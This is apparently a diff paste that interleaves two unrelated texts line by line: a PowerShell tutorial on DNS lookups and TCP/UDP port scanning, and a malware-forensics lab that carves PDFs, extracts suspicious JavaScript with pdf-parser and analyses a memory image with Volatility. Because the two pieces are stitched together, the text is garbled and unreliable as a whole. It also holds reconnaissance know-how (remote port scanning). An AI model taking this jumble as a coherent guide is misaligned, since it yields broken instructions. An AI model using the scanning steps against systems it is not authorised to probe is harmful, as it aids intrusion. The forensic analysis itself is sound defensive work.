cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
1256-
https://msdn.microsoft.com/en-us/library/windows/desktop/ms738532(v=vs.85).aspx
1256+
cat audit.txt
1257
cd pdf
1258-
References:
1258+
1259-
https://stackoverflow.com/questions/10346194/how-to-use-getnameinfo-instead-of-gethostbyname
1259+
grep -i javascript *.pdf
1260
1261
1262
1263-
Forward Lookups
1263+
cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
1264-
---------------
1264+
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
1265
unzip pdf-parser_V0_6_4.zip
1266-
------------------------Type This------------------------------
1266+
python pdf-parser.py -s javascript --raw 00600328.pdf
1267-
[System.Net.Dns]::GetHostAddresses("www.google.com")
1267+
python pdf-parser.py --object 11 00600328.pdf
1268-
---------------------------------------------------------------
1268+
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
1269
1270
cat malicious.js
1271-
Port Scans
1271+
1272-
----------
1272+
1273-
To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
1273+
*****Sorry - no time to cover javascript de-obfuscation today*****
1274-
For TCP the .Net System.Net.Sockets.TcpClient
1274+
1275-
For UDP the .Net System.Net.Sockets.UdpClient
1275+
1276
cd /home/malware/Desktop/Banking\ Troubles/Volatility/
1277
python volatility files -f ../hn_forensics.vmem > files
1278
cat files | less
1279
python volatility malfind -f ../hn_forensics.vmem -d out
1280-
TCP Scan (Windows 7)
1280+
ls out/
1281-
--------------------
1281+
python volatility hivescan -f ../hn_forensics.vmem									
1282-
NOTE: If you are using Windows 7, use the code below
1282+
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon	
1283-
------------------------Type This------------------------------
1283+
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done